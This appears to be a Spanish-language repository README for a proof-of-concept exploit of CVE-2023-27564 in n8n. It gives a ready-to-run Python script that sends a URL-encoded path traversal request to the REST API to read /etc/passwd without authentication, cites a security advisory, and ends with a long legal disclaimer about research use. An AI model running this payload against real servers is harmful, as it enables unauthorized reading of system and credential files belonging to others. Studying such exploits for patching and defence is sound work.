
Exploit de prueba de concepto para CVE-2023-27564 que permite la lectura anónima de archivos en n8n mediante path traversal en la REST API. Destinado a la investigación de seguridad y evaluación de vulnerabilidades.
Esta vulnerabilidad permite la lectura anónima de archivos en n8n.
import requests
url = "https://example.com/rest/data/filesystem:..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd:.svg"
response = requests.get(url)
print(response.status_code)
print(response.headers)
print(response.text)
https://www.synacktiv.com/sites/default/files/2023-05/Synacktiv-N8N-Multiple-Vulnerabilities_0.pdf
El PoC (Prueba de Concepto) proporcionado en este repositorio es únicamente con fines educativos y de investigación en seguridad. La información y el código están destinados a ser utilizados por profesionales de la ciberseguridad e investigadores para comprender y protegerse contra vulnerabilidades en software y sistemas. Cualquier uso de este PoC, la información relacionada o el código para atacar objetivos sin el consentimiento mutuo previo es ilegal y está estrictamente prohibido.
Al utilizar este PoC, usted acepta que comprende el impacto potencial de la vulnerabilidad que demuestra y que lo utilizará de manera responsable y ética. Los autores de este PoC renuncian a toda responsabilidad por cualquier uso indebido de este material o por cualquier daño que pueda ocurrir por el uso de la información y el código proporcionados. Es responsabilidad del usuario final cumplir con todas las leyes locales, estatales, nacionales e internacionales aplicables.
Los autores han hecho todo lo posible para garantizar la precisión y confiabilidad de la información proporcionada en este repositorio. Sin embargo, la información se proporciona "tal cual", sin garantía de ningún tipo. Los autores no aceptan ninguna responsabilidad u obligación por la exactitud, el contenido, la integridad, la legalidad o la confiabilidad de la información contenida.